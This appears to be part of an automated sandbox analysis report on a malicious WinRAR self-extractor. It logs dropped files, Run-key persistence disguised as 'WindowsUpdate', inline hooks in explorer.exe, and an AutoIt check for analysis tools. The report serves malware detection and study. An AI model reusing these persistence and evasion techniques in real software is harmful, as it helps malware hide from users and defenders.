              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeSection loaded: apphelp.dll
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: M1Y6kc9FpE.exeStatic file information: File size 1050479 > 1048576
              Source: M1Y6kc9FpE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: M1Y6kc9FpE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: M1Y6kc9FpE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: M1Y6kc9FpE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: M1Y6kc9FpE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: M1Y6kc9FpE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: M1Y6kc9FpE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: M1Y6kc9FpE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: M1Y6kc9FpE.exe, 00000000.00000003.1381988723.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, M1Y6kc9FpE.exe, 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp, M1Y6kc9FpE.exe, 00000000.00000003.1382771447.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
              Source: Binary string: ipconfig.pdb source: RegSvcs.exe, 0000000F.00000002.1666954416.00000000011F0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1666834363.00000000010B8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2628758777.0000000000A70000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: ipconfig.pdbGCTL source: RegSvcs.exe, 0000000F.00000002.1666954416.00000000011F0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1666834363.00000000010B8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2628758777.0000000000A70000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: cmmon32.pdb source: RegSvcs.exe, 0000001E.00000002.1950106186.0000000001368000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1949032877.0000000001790000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1947884202.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1954829620.0000000000790000.00000040.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1954301901.0000000000790000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: netsh.pdb source: RegSvcs.exe, 00000017.00000002.1819510620.0000000001194000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.1819510620.0000000001177000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001175000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818782095.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001157000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824871414.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823588566.00000000015C0000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: cmmon32.pdbGCTL source: RegSvcs.exe, 0000001E.00000002.1950106186.0000000001368000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1949032877.0000000001790000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000001F.00000002.1947884202.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1954829620.0000000000790000.00000040.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1954301901.0000000000790000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000F.00000000.1631580371.0000000000C42000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000011.00000002.2648732198.000000001064F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2629282852.0000000002C52000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2631520313.00000000035EF000.00000004.10000000.00040000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809597797.0000000000D72000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.1667342795.0000000001640000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.000000000323E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1668765170.0000000002EF4000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1666757118.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1687030423.0000000004AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1689172550.0000000004C76000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1819075958.00000000012E9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.0000000003790000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1823176512.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.000000000392E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1821135657.0000000003925000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003C6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1817988527.000000000377F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.0000000004660000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1948767641.000000000430C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1952398893.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1952399233.00000000048DF000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1948262742.000000000472C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1955122203.0000000004C2E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: netsh.pdbGCTL source: RegSvcs.exe, 00000017.00000002.1819510620.0000000001194000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.1819510620.0000000001177000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001175000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818782095.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.1818119289.0000000001157000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824871414.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823588566.00000000015C0000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.1667342795.0000000001640000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.000000000323E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2630215494.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1668765170.0000000002EF4000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000003.1666757118.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1687030423.0000000004AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004FBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1689172550.0000000004C76000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1691063135.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1819075958.00000000012E9000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.0000000003790000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000019.00000003.1823176512.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000019.00000002.1824957210.000000000392E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1821135657.0000000003925000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003C6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 0000001A.00000003.1817988527.000000000377F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000001A.00000002.1823794267.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.0000000004660000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000002.1955124284.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1948767641.000000000430C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000020.00000003.1952398893.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1952399233.00000000048DF000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000003.1948262742.000000000472C000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000021.00000002.1955122203.0000000004C2E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: rundll32.pdb source: RegSvcs.exe, 00000010.00000002.1686794971.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.1686542352.0000000001548000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1690754288.0000000000D80000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000010.00000002.1686794971.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.1686542352.0000000001548000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1690754288.0000000000D80000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000F.00000000.1631580371.0000000000C42000.00000002.00000001.01000000.0000000C.sdmp, explorer.exe, 00000011.00000002.2648732198.000000001064F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2629282852.0000000002C52000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000012.00000002.2631520313.00000000035EF000.00000004.10000000.00040000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809597797.0000000000D72000.00000004.00000020.00020000.00000000.sdmp
              Source: M1Y6kc9FpE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: M1Y6kc9FpE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: M1Y6kc9FpE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: M1Y6kc9FpE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: M1Y6kc9FpE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00535D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,8_2_00535D78
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6987781Jump to behavior
              Source: M1Y6kc9FpE.exeStatic PE information: section name: .didat
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A46680 push ecx; ret 0_2_00A46693
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A45773 push ecx; ret 0_2_00A45786
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102E89B push ebp; ret 8_3_0102E8AC
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00580332 push edi; ret 8_2_00580333
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00550E06 push ecx; ret 8_2_00550E19
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_004078CA push 0000006Ah; ret 15_2_004078CC
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_004178E4 pushfd ; iretd 15_2_004178E5
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_004168B1 push ds; iretd 15_2_004168B2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_004179F9 push ss; ret 15_2_00417A01
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041EB46 push EF2477BEh; ret 15_2_0041EB4E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041EB4F push EF2477BEh; ret 15_2_0041EB4E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_00417B8A push ebx; iretd 15_2_00417B97
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041D4D2 push eax; ret 15_2_0041D4D8
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041D4DB push eax; ret 15_2_0041D542
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041D485 push eax; ret 15_2_0041D4D8
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041D53C push eax; ret 15_2_0041D542

              Persistence and Installation Behavior

              barindex
              Uses ipconfig to lookup or modify the Windows network settings
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeFile created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe.exeJump to dropped file
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscFile created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.mscJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscFile created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscFile created: C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to dropped file
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscFile created: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.mscJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate

              Hooking and other Techniques for Hiding and Protection

              barindex
              Modifies the prolog of user mode functions (user mode inline hooks)
              Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE3
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005C25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,8_2_005C25A0
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0054FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,8_2_0054FC8A
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM autoit script
              Source: Yara matchFile source: Process Memory Space: oxhvi.msc PID: 8084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: oxhvi.msc.exe PID: 7596, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: oxhvi.msc.exe PID: 1796, type: MEMORYSTR
              Switches to a custom stack to bypass stack traces
              Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
              Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0774
              Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
              Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
              Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
              Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
              Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
              Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD8A4
              Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: oxhvi.msc, 00000008.00000003.1658007635.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656361973.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1657013245.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658351726.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656039617.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1655595000.0000000000EAC000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000002.1660309685.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538146992.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656222821.0000000000EB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENC
